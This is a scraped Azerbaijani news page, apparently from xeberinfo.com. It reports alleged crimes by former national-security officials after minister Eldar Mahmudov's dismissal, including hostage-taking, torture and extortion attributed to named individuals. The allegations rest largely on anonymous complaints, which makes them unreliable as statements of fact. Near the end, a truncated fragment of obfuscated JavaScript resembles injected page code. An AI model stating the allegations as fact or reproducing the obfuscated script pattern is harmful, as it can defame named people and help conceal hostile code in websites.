Redaktor seçimi
Qazinin Dövlət Qurumunda 3 Aylıq “Əsirlik” Həyatı -
Baba Rzayevin şəxsi maraqları “Lubristar LLC” MMC ilə harada toqquşdu?! -
ADAU-da Zəfər Qurbanovun qiyabiçi rektorluğu... -
"Unibank"ın rəhbəri Eldar Qəribovun Fransadakı izləri...-Oğlu İlkin Qəribli birinci oyundan "əli yaxşı gətirmiş" qumarbazdır/
Suraxanı məmurları Adil Əliyevin adını şəhid ailəsinin torpağını dağıtmaqda hallandırır -
Sərdar Ortac, Mehmet Əli Ərbil və Sahil Babayevin “qumar kontoru” -
Sumqayıt Dövlət Universiteti belə təmir edilir:
Sahil Babayevin "kontor"unda qumar oynanılır?! -
Günün xəbəri

MTN DƏHŞƏTLƏRİ VƏ AZADLIQDA GƏZƏN BANDİTLƏR!

mtn-055

Milli Təhlükəsizlik naziri Eldar Mahmudovun vəzifəsindən azad olunmasından və bu orqanda kök salmış təhlükəli kriminal qruplaşma əleyhinə xüsusi istintaq-əməliyyat tədbirlərinin başlanmasından 2 ay ötdü. İndiyədək aralarında generalların da olduğu 20-dək qruplaşma üzvü həbs olunub, yüzlərlə adam vəzifəsindən və xüsusi xidmət orqanından qovulub, yüzlərlə zərərçəkən rəsmən qeydə alınıb, nəhayət, MTN ləğv olunaraq, onun bazasında 2 müstəqil qurum – Dövlət Təhlükəsizliyi Xidməti (DTX) və Xarici Kəşfiyyat Xidmətləri yaradılıb. Baş Prokurorluqda yaradılmış xüsusi istintaq komissiyası isə işini davam etdirir.

Xeberinfo.com:   Nardaran hadisələri, ardınca “Günəşli” yatağında baş verən faciə, bu günlərdə isə manatın növbəti kəskin devalvasiyası “MTN işi” adlanan son 10 ilin ən sensasion cinayət işindən diqqəti bir qədər yayındırsa da, son illər ərzində MTN-də baş verən dəhşətlərlə bağlı yeni-yeni faktlar ortaya çıxmaqda davam edir. Az qala hər gün sabiq milli təhlükəsizlik naziri Eldar Mahmudovun və onun “General bandasının” ötən illər ərzində həyata keçirdiyi saysız cinayətlərin yeni qurbanları tapılır, onların mətbuatda açıqlamalarına rast gəlinir.
Ancaq bunlar belə MTN-dəki bandanın soyğunculuğuna, şantajına məruz qalmış insanların kiçik bir hissəsini təşkil edir. Vaxtilə üzləşdiyi şantajlardan, Mahmudovun bandası ilə bir yerdə işləyənlərin bəzilərinin hələ də vəzifədə olmasından və ya hansısa başqa bir səbəbdən çəkinərək mətbuata çıxmaqdan, şikayət etməkdən çəkinənlərin sayı-hesabı yoxdur.
Lakin hələlik ölkə prezidentinin Eldar Mahmudovu işdən çıxarmasından dərhal sonra Respublika Prokurorluğunda yaradılan xüsusi istintaq komissiyasında cəmi 57 nəfər zərərçəkən kimi tanınıb, MTN-nin 19 yüksək rütbəli əməkdaşına konkret maddələr üzrə cinayət ittihami irəli sürülüb.
Ancaq təbii ki, bunlar nə MTN-dəki bandanın soyğunçuluğu ilə üzləşənlərin, nə də cinayətlərdə iştirak edən banda üzvlərinin tam sayını əks etdirmir.

2 ayın ən böyük müəmması: Eldar Mahmudovun həbs olunmaması…

eldar-mainSon 2 ayın ən böyük müəmması isə, 10 ildə MTN-də baş verən ağır cinayətlərin başında duran, bu cinayətlərin təşkilatçısı və sifarişçisi olduğu şübhə doğurmayan keçmiş nazir Eldar Mahmudovun hələ də həbs olunmamasıdır. Bəzi ehtimallara görə, E.Mahmudovun həbsinin yubanması istintaqın onun əleyhinə materiallar toplamasının vaxt alması, həmçinin, keçmiş nazirin həbsinin doğura biləcəyi nəticələri dərindən götür-qoy etmək zərurəti ilə bağlıdır. Başqa sözlə, E.Mahmudovun özünü həbsdən sığortalamaq üçün tədbirlər görüb-görmədiyini dəqiqləşdirmək mümkün olmadığından, radikal addımın atılması riskli hesab olunur. Lakin mötəbər mənbələrdən “AzPolitika”ya verilən məlumata görə, E.Mahmudovun həbsi qaçılmaz olsa da, hakimiyyətdaxili müəyyən qüdrətli çevrələr, hələ ki, bu addımın atılmasını əngəlləyə bilirlər.

İstintaq Komissiyası prinsipial mövqe tuturmu?

WFw1ZuhR2Ta2Müşahidələr, əldə olunan məlumatlar onu göstərir ki, ümumiyyətlə istintaq komissiyası təkcə Eldar Mahmudova münasibətdə deyil (Aydındır ki, bununla bağlı siyasi qərarın olması da çox vacibdir-red), ümumiyyətlə MTN işinin istintaqında çox da “dərinə getməmək” kursunu tutub.Bunu adı bir çox ağır cinayətlərdə hallanan, barəsində konkret şikayətlər olan keçmiş MTN əməkdaşlarının hələ də məsuliyyətə cəlb olunmaması, bəzi şikayətlərin görməzdən gəlinməsi, həbs olunanların sayının cəmi 19 nəfərlə məhdudlaşması və digər faktlar da göstərir. Məsələn, MTN-də ağır cinayətlərin – qanunsuz həbslər, şərləmələr, telefon dinləmələri və sairənin baş verdiyi 4 əsas Baş İdarədən yalnız ikisinin rəisi həbsdədir. Bunlar MTN-in Energetika və Nəqliyyat Sahələrində Təhlükəsizlik Baş İdarəsinin rəisi, general-mayor Akif Çovdarov və Transmilli Mütəşəkkil Cinayətkarlığa Qarşı Mübarizə Baş İdarəsinin rəisi, general-mayor Sübahir Qurbanovdur. Ağır cinayətlərin baş verdiyi digər 2 baş idarənin – Antiterror Mərkəzinin və Baş İstintaq İdarəsinin rəisləri nəinki azadlıqdadır, heç onlar istintaqa belə cəlb olunmayıblar. Antiterror Mərkəzinin rəisi Elçin Quliyev isə hətta Təhlükəsizlik Akademiyasına kafedra müdiri də təyin olunub. Bu faktlar İstintaq Komissiyasının MTN işində prinsipial mövqe tutduğunu şübhə altına alır. Əksinə, əldə olunan məlumatlardan belə görünür ki, hansısa qüdrətli dairələr MTN-də çox ağır cinayətlərə yol vermiş bəzi keçmiş vəzifəli şəxsləri müxtəlif motivlərlə məsuliyyətdən kənarda saxlamağa çalışırlar və buna da nail olurlar.

Mövlan Şıxəliyev müəmması

mtn_bina_yeni_main_180215Məsələn, əmlakını, pulunu ələ keçirmək üçün MTN-də sahibkarlara qarşı həyata keçirilən terror əməliyyatının aktiv iştirakçısı olan Baş İstintaq İdarəsinin rəhbəri Mövlan Şıxəliyev və idarənin digər vəzifəli şəxsləri heç istintaqa belə cəlb olunmayıblar. Halbuki, yuxarıda da qeyd etdiyimiz kimi, MTN terroru ilə üzləşmiş əksər sahibkarlar məhz İstintaq İdarəsində “sındırılıblar”.

Məsələn, 2 gün əvvəl mətbuat konfransı keçirən vəkil Türkel Süleymanlı bildirib ki, hüquqlarını müdafiə etdiyi şəxs, hazırda həbsdə olan Elçin Abdullayev keçmiş MTN Baş İstintaq İdarəsinin sabiq rəis müavini Sahib Ələkbərov tərəfindən təqibə məruz qalıb və əsassız olaraq həbs edilib. Vəkilin sözlərinə görə, bu cinayət işi yalnız maddi maraq əsasında MTN tərəfindən başlanıb.
“Bunlara şamil olunmuş cinayət işi CM-nin 177-ci maddəsidir. Bu oğurluqdur. Bu maddənin istintaq işini DİN aparmalıdır. İstintaqı DİN-ə verməmək üçün Transmilli Cinayətkar qrup adlandırıb işi özləri aparıblar. İşin içində bir nəfər zərərçəkən şəxs və ya tərəf yoxdur. Məqsəd dəstə başçısı adlandırılan Rəhman Musayevi həbs etmək olmayıb. Məqsəd onun mülkünü, əmlakını ələ keçirmək olub. İstintaq gedib, adamlar həbs olunub. Sonra Rəhman Musayev barəsində həbs qəti imkan tədbiri dəyişdirilib”.

Dəstənin başçısı kimi həbs olunan Rəhman Musayev barəsində həbs qətimkan tədbiri dəyişdiriləndən sonra o yoxa çıxır və məhkəmə proseslərində belə iştirak etmir. Halbuki, istintaq işində Rəhman Musayev başda olmaqla bu şəxslərin guya Hindistan, Rusiya, ABŞ və digər ölkələrin vətəndaşlarından ibarət cinayətkar qrup formalaşdırdığı, heç bir xarici bank və fiziki şəxsin şikayəti, hətta adı olmadığı halda, Elçin Abdullayevin 140 min, Emin Zəkiyevin isə 40 min manat mənimsədikləri yazılaraq, onlar özgə əmlakını talamaqda ittiham ediliblər.

“Sahib Ələkbərov oğlumu girov götürdü…”

“AzPolitika.info”ya daxil olan konkret şikayət və əldə olunan digər məlumatlar göstərir ki, sözügedən Baş İstintaq İdarəsinin müstəntiqi Sahib Ələkbərov və idarənin rəisi Mövlan Şıxəliyev vətəndaşların mal-mülkünü, pulunu ələ keçirmək üçün bütün yaramazlıqları etməyə hazır olublar, o cümlədən, onların tələblərini yerinə yetirməyən insanların övladlarını girov götürüb, məqsədlərinə nail olana kimi heç bir rəsmiləşdirmə aparmadan MTN-in zirzəmisində saxlamaqdan belə çəkinməyiblər. Belə bir ağır cinayətlə üzləşmiş sahibkar “AzPolitika”ya şikayətində yazır ki, Baş İstintaq İdarəsinin müstəntiqi Sahib Ələkbərov şər və böhtanla ondan tələb etdiyi külli miqdarda vəsaiti ala bilməyəndə yeniyetmə oğlunu girov götürüb, MTN-in zirzəmisində ona işgəncə verdirdikdən sonra məqsədinə nail olub: “Oğlumu o vəziyyətdə görəndən sonra sanki dünya başıma uçdu. Gözümə heç nə görünmədi. Evimi satdım, üstünü də borcla düzəldib aparıb MTN-in arxa qapısında Sahib Ələkbərova verdim. Həyasızcasına dedi ki, 30-40 min özünə götürüb, qalanını rəisinə (Mövlan Şıxəliyevə-red) verəcək. Bir neçə saatdan sonra oğlumu MTN-in zirzəmisindəki girovluqdan azad etdilər”.

Hacı Məmmədova qarşı haqsızlıq…

haciMüəyyən səbəbdən bu dəhşət saçan şikayəti hələlik dərc etmirik, Respublika Prokurorluğuna rəsmi şikayət hazırlandığı üçün, lakin əminik ki, MTN-in ən qəddar müstəntiqlərindən biri olan, “işgəncə kralı” kimi ad çıxarmış, bir çox şərləmə ilə pulqoparma işini həyata keçirmiş Sahib Ələkbərovla bağlı şikayətlər saymaqla qurtaran deyil. Elə isə, necə olur ki, bu adam və onun cinayət ortağı Mövlan Şıxəliyev hələ də azadlıqda gəzirlər? Mahiyyətcə bu adamların gördüyü iş Akif Çovdarov, dünən intihar etdiyi bildirilən İlqar Əliyev və digərlərinin əməllərindən nə ilə fərqlənir? Belə qorxunc cinayətlərə yol vermiş Sahib Ələkbərov və Mövlan Şıxəliyev kimi insanların azadlıqda olması 10 ildir MTN-in təcridxanasında saxlanılan Hacı Məmmədova qarşı haqsızlıq deyilmi? Hacı Məmmədov da adamları girov götürüb, onların yaxınlarından pul alırdı. Üstəlik də bunu polis mundiri altında və DİN-in binasında etmirdi. Tipik kriminal kimi hərəkət edir, kimliyini gizləyirdi. Amma bunlar Hacı Məmmədovun etdiklərini günün-günorta çağı, uniformada və MTN-in binasında ediblər! Ölkənin milli təhlükəsizlik orqanının binasını “Qarabulağa” çeviriblər. İndi də rahatca öz həyatlarını yaşayırlar.

Sahib Ələkbərov həbsdədirmi?

Yeri gəlmişkən, bəzi KİV-lərdə Sahib Ələkbərovun hazırda həbsdə olduğu haqda məlumat verilib. Bu məlumat doğru deyil. S.Ələkbərov azadlıqdadır və Bakıda sərbəst həyatını yaşayır. Bəzi məlumatlara görə, S.Ələkbərov bir neçə ay əvvəl Eldar Mahmudov tərəfindən qurban verilərək, işdən çıxarılıb. Belə ki, şərlənərək 200 min dollar pulu əlindən alınmış sahibkarın nüfuzlu şəxs vasitəsilə Prezidentə Şikayətindən sonra E.Mahmudov Sahib Ələkbərovu qurban verməyə məcbur olub. Həmin vaxt onun barəsində cinayət işinin açıldığı bildirilsə də, bu məlumat öz təsdiqini tapmayıb.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "xeberinfo.com"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e


Facebook-da paylaş

Yeni xəbərlər

Reklam

Reklam